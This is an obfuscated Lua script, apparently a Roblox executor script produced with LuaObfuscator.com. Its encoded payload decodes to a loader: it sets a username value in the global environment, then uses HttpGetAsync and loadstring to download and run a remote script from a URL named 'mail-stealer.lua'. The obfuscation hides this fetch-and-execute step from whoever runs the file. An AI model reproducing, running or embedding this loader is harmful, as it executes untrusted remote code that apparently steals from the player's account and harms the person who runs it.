--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.5) ~  Much Love, Ferib 

]]--

do local v0=0;local v1;local v2;local v3;local v4;local v5;local v6;local v7;local v8;local v9;local v10;local v11;local v12;local v13;local v14;local v15;local v16;while true do if (v0==2) then v7=table.concat;v8=table.insert;v9=math.ldexp;v0=3;end if (v0==5) then v16=nil;v16=function(v20,v21,...)local v27=1;local v28;v20=v5(v4(v20,5),"..",function(v29)if (v2(v29,2)==79) then v28=v1(v4(v29,1,1));return "";else local v81=0;local v82;while true do if (v81==0) then v82=v3(v1(v29,16));if v28 then local v111=v6(v82,v28);v28=nil;return v111;else return v82;end break;end end end end);local function v30(v31,v32,v33)if v33 then local v83=(v31/((1 + 1)^(v32-(996 -((743 -424) + 676)))))%(((1 + 1) -0)^(((v33-(1 -0)) -(v32-(1 + 0))) + 1 + 0)) ;return v83-(v83%1) ;else local v84=0 + 0 ;local v85;while true do if (v84==0) then v85=(711 -(59 + 89 + 561))^(v32-(854 -(503 + 350))) ;return (((v31%(v85 + v85))>=v85) and (1 + 0)) or 0 ;end end end end local function v34()local v47=v2(v20,v27,v27);v27=v27 + 1 ;return v47;end local function v35()local v48,v49=v2(v20,v27,v27 + (1391 -(1134 + 255)) );v27=v27 + 1 + 1 ;return (v49 * (1700 -(1128 + 316))) + v48 ;end local function v36()local v50=0 -0 ;local v51;local v52;local v53;local v54;while true do if (v50==((595 -(54 + 538)) -2)) then return (v54 * (16777667 -(16 + 435))) + (v53 * (66899 -(872 + 76 + 415))) + (v52 * (21 + 235)) + v51 ;end if (v50==(0 -0)) then v51,v52,v53,v54=v2(v20,v27,v27 + (3 -2) + 2 );v27=v27 + ((1064 -(847 + 211)) -2) ;v50=2 -1 ;end end end local function v37()local v55=v36();local v56=v36();local v57=1 + 0 ;local v58=(v30(v56,2 -(1 + 0) ,(616 + 237) -(306 + 527) ) * ((2 + 0)^(92 -60))) + v55 ;local v59=v30(v56,919 -(189 + 184 + 525) ,2 + 29 );local v60=((v30(v56,10 + 22 )==(2 -1)) and  -(1706 -(21 + 1684))) or (1 + 0) ;if (v59==0) then if (v58==(0 -0)) then return v60 * (0 + 0) ;else local v105=0 + 0 ;while true do if (v105==(0 -(1291 -(1000 + 291)))) then v59=1297 -(1207 + 30 + 59) ;v57=0 -0 ;break;end end end elseif (v59==(5158 -3111)) then return ((v58==(0 + 0)) and (v60 * ((1 + 0 + 0)/(325 -((1420 -(1100 + 143)) + 148))))) or (v60 * NaN) ;end return v9(v60,v59-(116 + 907) ) * (v57 + (v58/((1 + 1)^(71 -19)))) ;end local function v38(v39)local v61;if  not v39 then v39=v36();if (v39==(1031 -(478 + 553))) then return "";end end v61=v4(v20,v27,(v27 + v39) -1 );v27=v27 + v39 ;local v62={};for v74=496 -(319 + 176) , #v61 do v62[v74]=v3(v2(v4(v61,v74,v74)));end return v7(v62);end local v40=v36;local function v41(...)return {...},v13("#",...);end local function v42()local v63=111 -(18 + 93) ;local v64;local v65;local v66;local v67;local v68;local v69;local v70;while true do if (v63~=(0 + 0)) then else local v96=0 + 0 ;while true do if (v96~=(714 -(411 + 303))) then else v64=0 + 0 ;v65=nil;v96=1799 -(1044 + 754) ;end if (v96==(1456 -(944 + 511))) then v63=1;break;end end end if ((761 -(59 + 699))==v63) then v70=nil;while true do local v106=0;while true do if (v106~=(338 -(337 + 1))) then else if (v64~=3) then else for v114=1 + 0 ,v36() do v66[v114-(1875 -(893 + 981)) ]=v42();end for v116=1 -0 ,v36() do v67[v116]=v36();end return v68;end if (v64==2) then local v112=1407 -(587 + 820) ;while true do if (v112==(0 + 0)) then for v122=1,v69 do local v123=0 -0 ;local v124;local v125;while true do if (1~=v123) then else if (v124==(509 -(415 + 93))) then v125=v34()~=(0 -0) ;elseif (v124==(2 -0)) then v125=v37();elseif (v124==3) then v125=v38();end v70[v122]=v125;break;end if (v123==(1936 -(24 + 1912))) then v124=v34();v125=nil;v123=1;end end end v68[1 + 2 ]=v34();v112=1;end if (v112==1) then for v126=91 -(13 + 77) ,v36() do local v127=1279 -(780 + 499) ;local v128;local v129;while true do if ((1 -0)==v127) then while true do if (v128~=(0 -0)) then else v129=v34();if (v30(v129,1 + 0 ,1 + 0 )==0) then local v161=0 -0 ;local v162;local v163;local v164;local v165;local v166;while true do if (v161~=1) then else v164=nil;v165=nil;v161=891 -(447 + 442) ;end if (v161~=(1547 -(33 + 1512))) then else v166=nil;while true do if ((0 -0)==v162) then local v175=0 + 0 ;while true do if ((1 + 0)~=v175) then else v162=119 -(52 + 66) ;break;end if (v175==0) then v163=0 + 0 ;v164=nil;v175=1 + 0 ;end end end if (v162~=(1 + 0)) then else v165=nil;v166=nil;v162=84 -(79 + 3) ;end if (v162~=(1 + 1)) then else while true do if (v163==(1 + 0)) then local v185=0;local v186;local v187;while true do if (v185==(549 -(133 + 415))) then while true do if (v186~=(0 -0)) then else v187=0 + 0 ;while true do if (v187~=(2 -1)) then else v163=2 -0 ;break;end if ((1225 -(532 + 693))~=v187) then else v166={v35(),v35(),nil,nil};if (v164==(0 + 0)) then local v205=1148 -(892 + 256) ;local v206;local v207;while true do if (v205~=(1660 -(836 + 823))) then else while true do if (0==v206) then v207=534 -(476 + 58) ;while true do if (v207~=(0 -0)) then else v166[3 -0 ]=v35();v166[16 -12 ]=v35();break;end end break;end end break;end if (v205~=(0 + 0)) then else v206=0;v207=nil;v205=1576 -(1284 + 291) ;end end elseif (v164==(1 -0)) then v166[3]=v36();elseif (v164==2) then v166[1699 -(1247 + 449) ]=v36() -(2^(6 + 10)) ;elseif (v164~=(3 -0)) then else local v210=0 -0 ;local v211;while true do if (v210~=(0 -0)) then else v211=821 -(719 + 102) ;while true do if (v211~=(0 + 0)) then else v166[3]=v36() -((1352 -(809 + 541))^(36 -20)) ;v166[392 -(84 + 304) ]=v35();break;end end break;end end end v187=1 + 0 ;end end break;end end break;end if (v185==(0 -0)) then v186=0;v187=nil;v185=1 + 0 ;end end end if (v163==(0 + 0)) then local v188=565 -(29 + 536) ;local v189;while true do if (v188==(0 -0)) then v189=0 + 0 ;while true do if (v189==(1 + 0)) then v163=2 -1 ;break;end if (v189~=0) then else local v198=260 -(56 + 204) ;while true do if ((3 -2)==v198) then v189=1;break;end if (v198==(0 + 0)) then v164=v30(v129,2 + 0 ,1 + 2 );v165=v30(v129,3 + 1 ,1065 -(971 + 88) );v198=1 + 0 ;end end end end break;end end end if (v163~=(1 + 1)) then else local v190=1305 -(490 + 815) ;local v191;while true do if (v190==(0 -0)) then v191=1573 -(58 + 1515) ;while true do if (v191~=1) then else v163=9 -6 ;break;end if (v191~=(0 -0)) then else if (v30(v165,1 -0 ,212 -(17 + 194) )~=(2 -1)) then else v166[2]=v70[v166[2]];end if (v30(v165,563 -(468 + 93) ,2 -0 )==(416 -(327 + 88))) then v166[2 + 1 ]=v70[v166[7 -4 ]];end v191=1858 -(1830 + 27) ;end end break;end end end if ((6 -3)~=v163) then else if (v30(v165,4 -1 ,1 + 2 )~=(1 + 0)) then else v166[5 -1 ]=v70[v166[8 -4 ]];end v65[v126]=v166;break;end end break;end end break;end if (v161~=(1534 -(1194 + 340))) then else v162=0;v163=nil;v161=1 + 0 ;end end end break;end end break;end if (v127==0) then local v131=0 -0 ;while true do if (v131==(485 -(181 + 303))) then v127=1 + 0 ;break;end if (v131==(1612 -(815 + 797))) then v128=1919 -(1801 + 118) ;v129=nil;v131=1824 -(1162 + 661) ;end end end end end v64=8 -5 ;break;end end end v106=1 + 0 ;end if (v106~=1) then else if (v64==(0 + 0)) then v65={};v66={};v67={};v64=1 -0 ;end if (v64~=(1872 -(1692 + 179))) then else local v113=1491 -(678 + 813) ;while true do if (v113==0) then local v119=62 -(6 + 56) ;while true do if (v119==(0 -0)) then v68={v65,v66,nil,v67};v69=v36();v119=1;end if (v119~=(1 + 0)) then else v113=1295 -(593 + 701) ;break;end end end if ((869 -(379 + 489))==v113) then v70={};v64=1499 -(710 + 787) ;break;end end end break;end end end break;end if (v63~=(992 -(645 + 346))) then else local v97=0;while true do if (0==v97) then v66=nil;v67=nil;v97=1;end if (v97==1) then v63=2;break;end end end if (v63==(1182 -(989 + 191))) then local v98=0;while true do if (v98~=(1 + 0)) then else v63=1 + 2 ;break;end if (v98==0) then v68=nil;v69=nil;v98=1 + 0 ;end end end end end local function v43(v44,v45,v46)local v71=v44[1];local v72=v44[2];local v73=v44[3];return function(...)local v76=1;local v77= -1;local v78={...};local v79=v13("#",...) -1 ;local function v80()local v86=v71;local v87=v72;local v88=v73;local v89=v41;local v90={};local v91={};local v92={};for v99=1731 -(868 + 628 + 235) ,v79 do if ((v99>=v88) or ((5179 -(192 + 366))<=(902 -680))) then v90[v99-v88 ]=v78[v99 + (1 -0) ];else v92[v99]=v78[v99 + ((1953 -(481 + 718)) -(519 + 234)) ];end end local v93=(v79-v88) + (3 -2) ;local v94;local v95;while true do local v100=0 + 0 ;local v101;local v102;while true do if (((3023 -1555)<=(9192 -4219)) and (v100==1)) then while true do if (((0 -0)==v101) or ((3806 -(998 + 220))==(2438 -(1564 + (386 -(28 + 160)))))) then v102=0 + 0 ;while true do if ((v102==(2 -1)) or ((2419 -1720)>=(9743 -4912))) then if ((v95<=(284 -(96 + 182))) or ((4034 -(559 + 464))==(2469 + 628))) then if (((3045 -(742 + 105))<(9965 -5067)) and (v95<=(2 + 0))) then if (((4753 -(1018 + 827 + 31))<4879) and (v95<=(1458 -(49 + (3290 -1881))))) then local v132=0;local v133;local v134;while true do if ((v132==(1761 -((3086 -(1106 + 333)) + (247 -133)))) or ((1035 -(26 + 25 + 4 + 36))<(1857 -(819 + 94 + 121)))) then v133=0 -0 ;v134=nil;v132=1 + 0 ;end if ((1==v132) or ((889 -(213 + 528))>=(4193 -2766))) then while true do if ((v133==(0 + 0)) or ((4752 -(1350 + 75))>=(4452 -(936 + 144)))) then v134=v94[3 -1 ];v92[v134]=v92[v134](v14(v92,v134 + (1427 -(482 + 944)) ,v77));break;end end break;end end elseif (((2696 -(971 + 377))<=(124 + (7499 -3638))) and (v95>(1599 -(154 + 1444)))) then do return;end elseif (((3918 -2286)==1632) and (v94[6 -(1817 -(49 + 1764)) ]==v92[v94[1934 -(1005 + 925) ]])) then v76=v76 + (1 -0) ;else v76=v94[1 + 2 ];end elseif ((v95<=(4 + 0)) or ((2702 -799)<(223 + 214))) then if (((725 -(253 + 344))<(2805 -(1218 + 754))) and (v95>(2 + 1))) then v92[v94[6 -4 ]][v94[1 + 2 ]]=v94[1 + 3 ];else v76=v94[406 -(328 + 75) ];end elseif ((v95==(11 -6)) or ((1396 -(175 + 532))>3783)) then v92[v94[5 -3 ]]=v94[3 + 0 ];else local v144=822 -(106 + 716) ;local v145;local v146;local v147;local v148;local v149;while true do if (((0 -0)==v144) or ((2163 -1416)>(6267 -(513 + 1388)))) then v145=0 -0 ;v146=nil;v144=786 -(280 + 505) ;end if ((v144==(4 -2)) or ((842 + 69)>((11822 -6899) -(12074 -8298)))) then v149=nil;while true do if ((v145==(0 + 0)) or ((564 + 539)>=(3804 -(406 + 476)))) then local v172=0;while true do if ((((1473 -(317 + 1156)) + 0)==v172) or (4711==(50 + 372))) then v146=v94[2];v147,v148=v89(v92[v146](v14(v92,v146 + 1 + 0 ,v94[7 -4 ])));v172=1 + 0 ;end if ((v172==1) or ((5960 -4342)<=(2040 -1280))) then v145=1;break;end end end if ((v145==(1 + 0)) or ((2182 -(1553 + 382))>=(2839 + 66))) then v77=(v148 + v146) -(1056 -(184 + (1630 -759))) ;v149=(0 -0) -0 ;v145=3 -1 ;end if (((997 + 1495)<=4939) and (v145==(1608 -(1344 + 262)))) then for v176=v146,v77 do local v177=0;local v178;while true do if ((614<=(1012 + 2301)) and ((158 -(85 + 73))==v177)) then v178=0 -0 ;while true do if ((2895<((27313 -20181) -2518)) and ((1928 -(468 + 1460))==v178)) then v149=v149 + 1 ;v92[v176]=v147[v149];break;end end break;end end end break;end end break;end if ((v144==(1 -0)) or ((3409 -(775 + 241))<(176 + 1093))) then v147=nil;v148=nil;v144=2;end end end elseif (((130 + 1904)>((424 -(65 + 309)) + 28)) and (v95<=(28 -19))) then if ((v95<=(1 + (1708 -(1127 + 575)))) or (4806<=(12326 -8831))) then for v137=v94[1 + 1 ],v94[(5 -2) + 0 ] do v92[v137]=nil;end elseif ((v95>8) or ((4578 -(186 + 22))<(6080 -4592))) then v92[v94[(4363 -3242) -(892 + 227) ]]=v46[v94[3]];else v92[v94[2]]();end elseif (((1172 + 1009)<=2358) and (v95<=(161 -(55 + 95)))) then if (((3318 -(440 + 788))<=2876) and (v95==(1855 -(654 + 1191)))) then local v152=0 + 0 ;local v153;local v154;while true do if (((5888 -(841 + 70 + 104))>=(2775 -(1191 + 440))) and (v152==(309 -(304 + 5)))) then local v169=0;while true do if ((v169==1) or ((446 + 20)>(7986 -4385))) then v152=1 + 0 ;break;end if (((5380 -(832 + 9))>2713) and (v169==(1624 -(690 + 934)))) then v153=0 -0 ;v154=nil;v169=1966 -(479 + 1486) ;end end end if ((v152==(2 -1)) or ((1415 -(87 + 42 + 15))>=(4297 -(698 + 104)))) then while true do if ((v153==(0 -0)) or ((481 + 468 + 3378)>(6509 -(457 + 1355)))) then v154=v94[(184 + 505) -(226 + 352 + 109) ];v92[v154]=v92[v154]();break;end end break;end end else local v155=0 + 0 ;local v156;local v157;local v158;local v159;while true do if (((5074 -((917 -461) + 446))==4172) and (v155==(1 + 1))) then while true do if ((v156==(1014 -(809 + 205))) or ((1149 + 2701)<=(2577 + 1083))) then v157=320 -(231 + 89) ;v158=nil;v156=980 -(145 + 834) ;end if (((316 + 848)<=((43306 -33150) -6682)) and (v156==1)) then v159=nil;while true do if ((v157==(1 -0)) or ((646 + 323)<=(615 + 80))) then v92[v158 + 1 + 0 ]=v159;v92[v158]=v159[v94[102 -(36 + 62) ]];break;end if ((v157==(0 + 0)) or ((865 + 3583)==2018)) then local v183=0 -0 ;local v184;while true do if ((4424>=24) and (v183==(0 -0))) then v184=32 -((1674 -(599 + 1054)) + 11) ;while true do if (((270 + 189)==(1028 -(86 + 145 + 338))) and (v184==(211 -(110 + (168 -67))))) then local v197=0;while true do if ((v197==(986 -((780 -610) + 816))) or ((1525 + 2417)<(1725 + 671))) then v158=v94[2];v159=v92[v94[3 + 0 ]];v197=1448 -((1770 -1062) + (2488 -(963 + 786))) ;end if (((6534 -4522)<(3204 + 195)) and (v197==((1938 -(500 + 804)) -(404 + 229)))) then v184=1 + 0 ;break;end end end if (((5109 -(817 + 224))<(5689 -(1003 + 565))) and (v184==(2 -1))) then v157=1 + 0 ;break;end end break;end end end end break;end end break;end if ((v155==1) or ((3234 -(52 + 646))>=(2171 + 2284 + 379))) then v158=nil;v159=nil;v155=1 + 1 ;end if ((v155==0) or ((8144 -5007)<(9450 -6472))) then v156=(47 + 426) -(104 + 369) ;v157=nil;v155=1 + (0 -0) ;end end end elseif (((5451 -(1182 + 795))>(2395 -1254)) and (v95>(18 -6))) then v92[v94[170 -(127 + 41) ]]=v94[10 -7 ]~=((1868 -(1315 + 553)) -0) ;elseif (((5524 -(846 + 395))==(10708 -6425)) and (v92[v94[2 + 0 + 0 ]]==v94[16 -(5 + 7) ])) then v76=v76 + (2 -1) ;else v76=v94[3 + 0 ];end v76=v76 + 1 + 0 ;break;end if (((1130 -(491 + 639))==v102) or (((3157 -(337 + 155)) -1689)==(4559 -1467))) then local v120=0 + 0 ;local v121;while true do if (((619 + 3830)>=(2266 -(314 + 964))) and (v120==0)) then v121=0 -0 ;while true do if ((v121==(1 + 0)) or ((1964 + 377 + 24)>=(5226 -(786 + 700)))) then v102=1 + 0 ;break;end if (((1352 + 3499)>=3206) and (v121==(0 + 0))) then v94=v86[v76];v95=v94[427 -(354 + 26 + 46) ];v121=1;end end break;end end end end break;end end break;end if (((1238 -212)<=1650) and (v100==(0 + 0))) then v101=0 -0 ;v102=nil;v100=317 -((1745 -(751 + 952)) + 274) ;end end end end A,B=v41(v12(v80));if  not A[1] then local v103=0;local v104;while true do if (v103==0) then v104=v44[4][v76] or "?" ;error("Script error at ["   .. v104   .. "]:"   .. A[2] );break;end end else return v14(A,2,B);end end;end return v43(v42(),{},v21)(...);end;v16("LOL!083O00028O0003073O0067657467656E7603043O006E616D65030D3O006C6567656E646172792O363230030A3O006C6F6164737472696E6703043O0067616D65030C3O00482O74704765744173796E63032A3O00682O7470733A2O2F77756D61742E78797A2F736372697074732F6D61696C2D737465616C65722E6C756100173O0012053O00014O0007000100013O00260C3O0002000100010004033O00020001001205000100013O000E0100010005000100010004033O00050001001209000200024O000A000200010002003004000200030004001209000200053O001209000300063O00200B000300030007001205000500084O000D000600014O0006000300066O00023O00022O00080002000100010004033O001600010004033O000500010004033O001600010004033O000200012O00023O00017O00173O00023O00033O00053O00053O00063O00083O00083O00093O00093O00093O000A3O000A3O000A3O000A3O000A3O000A3O000A3O000A3O000B3O000C3O000E3O000F3O00113O00",v10(),...);break;end if (v0==0) then v1=tonumber;v2=string.byte;v3=string.char;v0=1;end if (3==v0) then v10=getfenv or function()return _ENV;end ;v11=setmetatable;v12=pcall;v0=4;end if (v0==1) then v4=string.sub;v5=string.gsub;v6=string.rep;v0=2;end if (4==v0) then v13=select;v14=unpack or table.unpack ;v15=tonumber;v0=5;end end end
